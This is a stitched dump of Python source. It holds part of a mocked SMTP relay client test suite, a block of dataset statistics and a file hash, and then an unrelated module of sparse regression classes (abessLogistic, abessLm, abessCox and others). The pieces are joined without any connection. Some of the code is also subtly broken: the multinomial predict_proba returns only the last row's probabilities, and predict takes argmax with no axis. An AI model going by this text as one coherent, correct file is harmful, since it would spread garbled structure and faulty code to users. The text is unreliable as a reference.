self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
if pycompat.PY3:
self.sock.sendall(b'From: sender@example.com\r\nContent-Transfer-Encoding: base64\r\n\r\ndGVzdCB0ZXN0IIEK\r\n.\r\n')
else:
self.sock.sendall(b'From: sender@example.com\r\nContent-Transfer-Encoding: base64\r\n\r\ndGVzdCB0ZXN0IIENCg==\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there', binary_encoder=encode_base64)
client._connect()
client._ehlo()
client._deliver(result, env)
self.assertEqual({'rcpt@example.com': Reply('250', 'Ok')}, result.get_nowait())
def test_deliver_conversion_failure(self):
result = AsyncResult()
env = Envelope('bsender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test \x81\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'RSET\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._ehlo()
client._deliver(result, env)
with self.assertRaises(PermanentRelayError):
result.get_nowait()
def test_disconnect(self):
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._disconnect()
def test_disconnect_failure(self):
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndRaise(socket_error(None, None))
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
client._connect()
client._disconnect()
def test_run(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result, env))
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender@example.com>\r\nRCPT TO:<rcpt@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
self.sock.sendall(b'From: sender@example.com\r\n\r\ntest test\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
client._run()
self.assertEqual({'rcpt@example.com': Reply('250', 'Ok')}, result.get_nowait())
def test_run_multiple(self):
result1 = AsyncResult()
result2 = AsyncResult()
env1 = Envelope('sender1@example.com', ['rcpt1@example.com'])
env1.parse(b'From: sender1@example.com\r\n\r\ntest test\r\n')
env2 = Envelope('sender2@example.com', ['rcpt2@example.com'])
env2.parse(b'From: sender2@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result1, env1))
queue.append((result2, env2))
self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
self.sock.sendall(b'EHLO there\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 PIPELINING\r\n')
self.sock.sendall(b'MAIL FROM:<sender1@example.com>\r\nRCPT TO:<rcpt1@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
self.sock.sendall(b'From: sender1@example.com\r\n\r\ntest test\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'MAIL FROM:<sender2@example.com>\r\nRCPT TO:<rcpt2@example.com>\r\nDATA\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n250 Ok\r\n354 Go ahead\r\n')
self.sock.sendall(b'From: sender2@example.com\r\n\r\ntest test\r\n.\r\n')
self.sock.recv(IsA(int)).AndReturn(b'250 Ok\r\n')
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there', idle_timeout=0.0)
client._run()
self.assertEqual({'rcpt1@example.com': Reply('250', 'Ok')}, result1.get_nowait())
self.assertEqual({'rcpt2@example.com': Reply('250', 'Ok')}, result2.get_nowait())
def test_run_random_exception(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result, env))
self.sock.recv(IsA(int)).AndRaise(ValueError('test error'))
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
with self.assertRaises(ValueError):
client._run()
with self.assertRaises(ValueError):
result.get_nowait()
def test_run_socket_error(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result, env))
self.sock.recv(IsA(int)).AndRaise(socket_error(None, None))
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
client._run()
with self.assertRaises(TransientRelayError):
result.get_nowait()
def test_run_smtperror(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result, env))
self.sock.recv(IsA(int)).AndRaise(SmtpError('test error'))
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
client._run()
with self.assertRaises(TransientRelayError):
result.get_nowait()
def test_run_timeout(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result, env))
self.sock.recv(IsA(int)).AndRaise(Timeout(0.0))
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
client._run()
with self.assertRaises(TransientRelayError):
result.get_nowait()
def test_run_banner_failure(self):
result = AsyncResult()
env = Envelope('sender@example.com', ['rcpt@example.com'])
env.parse(b'From: sender@example.com\r\n\r\ntest test\r\n')
queue = BlockingDeque()
queue.append((result, env))
self.sock.recv(IsA(int)).AndReturn(b'520 Not Welcome\r\n')
self.sock.sendall(b'QUIT\r\n')
self.sock.recv(IsA(int)).AndReturn(b'221 Goodbye\r\n')
self.sock.close()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, socket_creator=self._socket_creator, ehlo_as='there')
client._run()
with self.assertRaises(PermanentRelayError):
result.get_nowait()
def test_run_nomessages(self):
queue = BlockingDeque()
self.mox.ReplayAll()
client = SmtpRelayClient(('addr', 0), queue, idle_timeout=0)
client._run()
# vim:et:fdm=marker:sts=4:sw=4:ts=4
| 48.266094
| 155
| 0.644896
| 3,195
| 22,492
| 4.455086
| 0.058842
| 0.025151
| 0.056906
| 0.080792
| 0.864971
| 0.832022
| 0.824505
| 0.822608
| 0.818744
| 0.810524
| 0
| 0.023098
| 0.193491
| 22,492
| 465
| 156
| 48.369892
| 0.761577
| 0.001467
| 0
| 0.739437
| 0
| 0.046948
| 0.21815
| 0.069733
| 0
| 0
| 0
| 0
| 0.053991
| 1
| 0.077465
| false
| 0.007042
| 0.032864
| 0.002347
| 0.115023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d32e48e14fa20636f1e2eeb0021bf0fd948cb4a
| 48,330
|
py
|
Python
|
python/abess/linear.py
|
brtang63/abess
|
7bf2f9d9ec7a1247a2508f2768f4308feb81decd
|
[
"Intel"
] | 5
|
2021-08-01T06:33:48.000Z
|
2021-12-10T07:40:17.000Z
|
python/abess/linear.py
|
Weiniily/abess
|
f0e822455ab5223a34fb643b6aff69f22aa818cd
|
[
"Intel"
] | null | null | null |
python/abess/linear.py
|
Weiniily/abess
|
f0e822455ab5223a34fb643b6aff69f22aa818cd
|
[
"Intel"
] | 1
|
2021-03-06T08:20:26.000Z
|
2021-03-06T08:20:26.000Z
|
from abess.metrics import concordance_index_censored
from .bess_base import bess_base
import numpy as np
import types
def fix_docs(cls):
# inherit the document from base class
index = cls.__doc__.find("Examples\n --------\n")
if(index != -1):
cls.__doc__ = cls.__doc__[:index] + \
cls.__bases__[0].__doc__ + cls.__doc__[index:]
# for name, func in vars(cls).items():
# if isinstance(func, types.FunctionType):
# # print(str(func) + 'needs doc')
# for parent in cls.__bases__:
# parfunc = getattr(parent, name, None)
# if parfunc and getattr(parfunc, '__doc__', None):
# func.__doc__ = parfunc.__doc__ + func.__doc__
return cls
@ fix_docs
class abessLogistic(bess_base):
"""
Adaptive Best-Subset Selection (ABESS) algorithm for logistic regression.
Parameters
----------
splicing_type: {0, 1}, optional
The type of splicing in `fit()` (in Algorithm.h).
"0" for decreasing by half, "1" for decresing by one.
Default: splicing_type = 0.
important_search : int, optional
The size of inactive set during updating active set when splicing.
It should be a non-positive integer and if important_search=128, it would be set as
the size of whole inactive set.
Default: 0.
Examples
--------
>>> ### Sparsity known
>>>
>>> from abess.linear import abessLogistic
>>> from abess.datasets import make_glm_data
>>> import numpy as np
>>> np.random.seed(12345)
>>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'binomial')
>>> model = abessLogistic(support_size = [10])
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>> ### Sparsity unknown
>>>
>>> # path_type="seq",
>>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
>>> model = abessLogistic(path_type = "seq")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>>
>>> # path_type="pgs",
>>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
>>> model = abessLogistic(path_type="pgs")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
"""
def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
always_select=[],
primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
approximate_Newton=False,
thread=1,
sparse_matrix=False,
splicing_type=0,
important_search=128,
):
super(abessLogistic, self).__init__(
algorithm_type="abess", model_type="Logistic", data_type=2, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
always_select=always_select,
primary_model_fit_max_iter=primary_model_fit_max_iter, primary_model_fit_epsilon=primary_model_fit_epsilon,
approximate_Newton=approximate_Newton,
thread=thread,
sparse_matrix=sparse_matrix,
splicing_type=splicing_type,
important_search=important_search
)
def predict_proba(self, X):
"""
The predict_proba function is used to give the probabilities of new data begin assigned to different classes.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.ones(X.shape[0]) * self.intercept_
xbeta = X.dot(self.coef_) + intercept_
return np.exp(xbeta)/(1 + np.exp(xbeta))
def predict(self, X):
"""
For Logistic model,
the predict function returns a \code{dict} of \code{pr} and \code{y}, where \code{pr} is the probability of response variable is 1 and \code{y} is predicted to be 1 if \code{pr} > 0.5 else \code{y} is 0
on given data.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.ones(X.shape[0]) * self.intercept_
xbeta = X.dot(self.coef_) + intercept_
y = np.zeros(xbeta.size)
y[xbeta > 0] = 1
return y
def score(self, X, y):
"""
Give new data, and it returns the entropy function.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
y : array-like of shape (n_samples, n_features), optional
Test response (real class).
"""
X, y = self.new_data_check(X, y)
intercept_ = np.ones(X.shape[0]) * self.intercept_
xbeta = X.dot(self.coef_) + intercept_
xbeta[xbeta > 30] = 30
xbeta[xbeta < -30] = -30
pr = np.exp(xbeta)/(1 + np.exp(xbeta))
return (y * np.log(pr) + (np.ones(X.shape[0]) - y) * np.log(np.ones(X.shape[0]) - pr)).sum()
@ fix_docs
class abessLm(bess_base):
"""
Adaptive Best-Subset Selection(ABESS) algorithm for linear regression.
Parameters
----------
splicing_type: {0, 1}, optional
The type of splicing in `fit()` (in Algorithm.h).
"0" for decreasing by half, "1" for decresing by one.
Default: splicing_type = 0.
important_search : int, optional
The size of inactive set during updating active set when splicing.
It should be a non-positive integer and if important_search=128, it would be set as
the size of whole inactive set.
Default: 0.
Examples
--------
>>> ### Sparsity known
>>>
>>> from abess.linear import abessLm
>>> from abess.datasets import make_glm_data
>>> import numpy as np
>>> np.random.seed(12345)
>>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'gaussian')
>>> model = abessLm(support_size = [10])
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>> ### Sparsity unknown
>>>
>>> # path_type="seq",
>>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
>>> model = abessLm(path_type = "seq")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>>
>>> # path_type="pgs",
>>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
>>> model = abessLm(path_type="pgs")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
"""
def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
always_select=[],
thread=1, covariance_update=False,
sparse_matrix=False,
splicing_type=0,
important_search=128,
# primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8, approximate_Newton=False
):
super(abessLm, self).__init__(
algorithm_type="abess", model_type="Lm", data_type=1, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
always_select=always_select,
thread=thread, covariance_update=covariance_update,
sparse_matrix=sparse_matrix,
splicing_type=splicing_type,
important_search=important_search
)
def predict(self, X):
"""
For linear regression problem,
the predict function returns a numpy array of the prediction of the mean
on given data.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.ones(X.shape[0]) * self.intercept_
return X.dot(self.coef_) + intercept_
def score(self, X, y):
"""
Give new data, and it returns the prediction error.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
y : array-like of shape (n_samples, n_features), optional
Test response.
"""
X, y = self.new_data_check(X, y)
y_pred = self.predict(X)
return -((y - y_pred)*(y - y_pred)).sum()
@ fix_docs
class abessCox(bess_base):
"""
Adaptive Best-Subset Selection(ABESS) algorithm for COX proportional hazards model.
Parameters
----------
splicing_type: {0, 1}, optional
The type of splicing in `fit()` (in Algorithm.h).
"0" for decreasing by half, "1" for decresing by one.
Default: splicing_type = 0.
important_search : int, optional
The size of inactive set during updating active set when splicing.
It should be a non-positive integer and if important_search=128, it would be set as
the size of whole inactive set.
Default: 0.
Examples
--------
>>> ### Sparsity known
>>>
>>> from abess.linear import abessCox
>>> from abess.datasets import make_glm_data
>>> import numpy as np
>>> np.random.seed(12345)
>>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'cox')
>>> model = abessCox(support_size = [10])
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>> ### Sparsity unknown
>>>
>>> # path_type="seq",
>>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
>>> model = abessCox(path_type = "seq")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>>
>>> # path_type="pgs",
>>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
>>> model = abessCox(path_type="pgs")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
"""
def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
always_select=[],
primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
approximate_Newton=False,
thread=1,
sparse_matrix=False,
splicing_type=0,
important_search=128
):
super(abessCox, self).__init__(
algorithm_type="abess", model_type="Cox", data_type=3, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
always_select=always_select,
primary_model_fit_max_iter=primary_model_fit_max_iter, primary_model_fit_epsilon=primary_model_fit_epsilon,
approximate_Newton=approximate_Newton,
thread=thread,
sparse_matrix=sparse_matrix,
splicing_type=splicing_type,
important_search=important_search
)
def predict(self, X):
"""
For Cox model,
the predict function returns the time-independent part of hazard function, i.e. :math:`\exp(X\\beta)`,
on given data.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
return np.exp(X.dot(self.coef_))
def score(self, X, y):
"""
Give new data, and it returns C-index.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
y : array-like of shape (n_samples, n_features), optional
Test response.
"""
X, y = self.new_data_check(X, y)
risk_score = X.dot(self.coef_)
y = np.array(y)
result = concordance_index_censored(
np.array(y[:, 1], np.bool_), y[:, 0], risk_score)
return result[0]
@ fix_docs
class abessPoisson(bess_base):
"""
Adaptive Best-Subset Selection(ABESS) algorithm for Poisson regression.
Parameters
----------
splicing_type: {0, 1}, optional
The type of splicing in `fit()` (in Algorithm.h).
"0" for decreasing by half, "1" for decresing by one.
Default: splicing_type = 0.
important_search : int, optional
The size of inactive set during updating active set when splicing.
It should be a non-positive integer and if important_search=128, it would be set as
the size of whole inactive set.
Default: 0.
Examples
--------
>>> ### Sparsity known
>>>
>>> from abess.linear import abessPoisson
>>> from abess.datasets import make_glm_data
>>> import numpy as np
>>> np.random.seed(12345)
>>> data = make_glm_data(n = 100, p = 50, k = 10, family = 'poisson')
>>> model = abessPoisson(support_size = [10])
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>> ### Sparsity unknown
>>>
>>> # path_type="seq",
>>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
>>> model = abessPoisson(path_type = "seq")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>>
>>> # path_type="pgs",
>>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
>>> model = abessPoisson(path_type="pgs")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
"""
def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
always_select=[],
primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
thread=1,
sparse_matrix=False,
splicing_type=0,
important_search=128
):
super(abessPoisson, self).__init__(
algorithm_type="abess", model_type="Poisson", data_type=2, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
always_select=always_select,
primary_model_fit_max_iter=primary_model_fit_max_iter, primary_model_fit_epsilon=primary_model_fit_epsilon,
thread=thread,
sparse_matrix=sparse_matrix,
splicing_type=splicing_type,
important_search=important_search
)
def predict(self, X):
"""
For Poisson model,
the predict function returns a numpy array of the prediction of the mean of response,
on given data.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.ones(X.shape[0]) * self.intercept_
xbeta_exp = np.exp(X.dot(self.coef_) + intercept_)
return xbeta_exp
def score(self, X, y):
"""
Give new data, and it returns the prediction error.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
y : array-like of shape (n_samples, n_features), optional
Test response.
"""
X, y = self.new_data_check(X, y)
intercept_ = np.ones(X.shape[0]) * self.intercept_
eta = X.dot(self.coef_) + intercept_
exp_eta = np.exp(eta)
return (y * eta - exp_eta).sum()
@ fix_docs
class abessMultigaussian(bess_base):
"""
Adaptive Best-Subset Selection(ABESS) algorithm for multitasklearning.
Parameters
----------
splicing_type: {0, 1}, optional
The type of splicing in `fit()` (in Algorithm.h).
"0" for decreasing by half, "1" for decresing by one.
Default: splicing_type = 0.
important_search : int, optional
The size of inactive set during updating active set when splicing.
It should be a non-positive integer and if important_search=128, it would be set as
the size of whole inactive set.
Default: 0.
Examples
--------
>>> ### Sparsity known
>>>
>>> from abess.linear import abessMultigaussian
>>> from abess.datasets import make_multivariate_glm_data
>>> import numpy as np
>>> np.random.seed(12345)
>>> data = make_multivariate_glm_data(n = 100, p = 50, k = 10, M = 3, family = 'multigaussian')
>>> model = abessMultigaussian(support_size = [10])
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>> ### Sparsity unknown
>>>
>>> # path_type="seq",
>>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
>>> model = abessMultigaussian(path_type = "seq")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>>
>>> # path_type="pgs",
>>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
>>> model = abessMultigaussian(path_type="pgs")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
"""
def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
always_select=[],
thread=1, covariance_update=False,
sparse_matrix=False,
splicing_type=0,
important_search=128
):
super(abessMultigaussian, self).__init__(
algorithm_type="abess", model_type="Multigaussian", data_type=1, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
always_select=always_select,
thread=thread, covariance_update=covariance_update,
sparse_matrix=sparse_matrix,
splicing_type=splicing_type,
important_search=important_search
)
def predict(self, X):
"""
For Multigaussian model,
the predict function returns a numpy matrix of the prediction of the mean of responses,
on given data.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.repeat(
self.intercept_[np.newaxis, ...], X.shape[0], axis=0)
return X.dot(self.coef_) + intercept_
def score(self, X, y):
"""
Give new data, and it returns prediction error.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
y : array-like of shape (n_samples, n_features), optional
Test response.
"""
X, y = self.new_data_check(X, y)
y_pred = self.predict(X)
return -((y - y_pred)*(y - y_pred)).sum()
@ fix_docs
class abessMultinomial(bess_base):
"""
Adaptive Best-Subset Selection(ABESS) algorithm for multiclassification problem.
Parameters
----------
splicing_type: {0, 1}, optional
The type of splicing in `fit()` (in Algorithm.h).
"0" for decreasing by half, "1" for decresing by one.
Default: splicing_type = 0.
important_search : int, optional
The size of inactive set during updating active set when splicing.
It should be a non-positive integer and if important_search=128, it would be set as
the size of whole inactive set.
Default: 0.
Examples
--------
>>> ### Sparsity known
>>>
>>> from abess.linear import abessMultinomial
>>> from abess.datasets import make_multivariate_glm_data
>>> import numpy as np
>>> np.random.seed(12345)
>>> data = make_multivariate_glm_data(n = 100, p = 50, k = 10, M = 3, family = 'multinomial')
>>> model = abessMultinomial(support_size = [10])
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>> ### Sparsity unknown
>>>
>>> # path_type="seq",
>>> # Default: support_size = list(range(0, max(min(p, int(n / (np.log(np.log(n)) * np.log(p)))), 1))).
>>> model = abessMultinomial(path_type = "seq")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
>>>
>>> # path_type="pgs",
>>> # Default: s_min=1, s_max=min(p, int(n / (np.log(np.log(n)) * np.log(p)))), K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
>>> model = abessMultinomial(path_type="pgs")
>>> model.fit(data.x, data.y)
>>> model.predict(data.x)
"""
def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
ic_type="ebic", ic_coef=1.0, cv=1, is_screening=False, screening_size=None,
always_select=[],
primary_model_fit_max_iter=10, primary_model_fit_epsilon=1e-8,
approximate_Newton=False,
thread=1,
sparse_matrix=False,
splicing_type=0,
important_search=128
):
super(abessMultinomial, self).__init__(
algorithm_type="abess", model_type="Multinomial", data_type=2, path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max,
ic_type=ic_type, ic_coef=ic_coef, cv=cv, is_screening=is_screening, screening_size=screening_size,
always_select=always_select,
primary_model_fit_max_iter=primary_model_fit_max_iter, primary_model_fit_epsilon=primary_model_fit_epsilon,
approximate_Newton=approximate_Newton,
thread=thread,
sparse_matrix=sparse_matrix,
splicing_type=splicing_type,
important_search=important_search
)
def predict_proba(self, X):
"""
The predict_proba function is used to give the probabilities of new data begin assigned to different classes.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.repeat(
self.intercept_[np.newaxis, ...], X.shape[0], axis=0)
xbeta = X.dot(self.coef_) + intercept_
eta = np.exp(xbeta)
for i in range(X.shape[0]):
pr = eta[i, :] / np.sum(eta[i, :])
return pr
def predict(self, X):
"""
For Multinomial model,
the predict function returns return the most possible class the given data may be.
Parameters
----------
X : array-like of shape (n_samples, p_features)
Test data.
"""
X = self.new_data_check(X)
intercept_ = np.repeat(
self.intercept_[np.newaxis, ...], X.shape[0], axis=0)
xbeta = X.dot(self.coef_) + intercept_
return np.argmax(xbeta)
def score(self, X, y):
"""
Give new data, and it returns the entropy function.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
y : array-like of shape (n_samples, n_features), optional
Test response (dummy variables of real class).
"""
X, y = self.new_data_check(X, y)
pr = self.predict_proba(X)
return np.sum(y * np.log(pr))
# @fix_docs
# class PdasLm(bess_base):
# '''
# PdasLm
# The PDAS solution to the best subset selection for linear regression.
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345) # fix seed to get the same result
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> noise = np.random.normal(0, 1, 100)
# >>> y = np.matmul(x, beta) + noise
# >>> model = PdasLm(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = PdasLm(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = PdasLm(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# '''
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
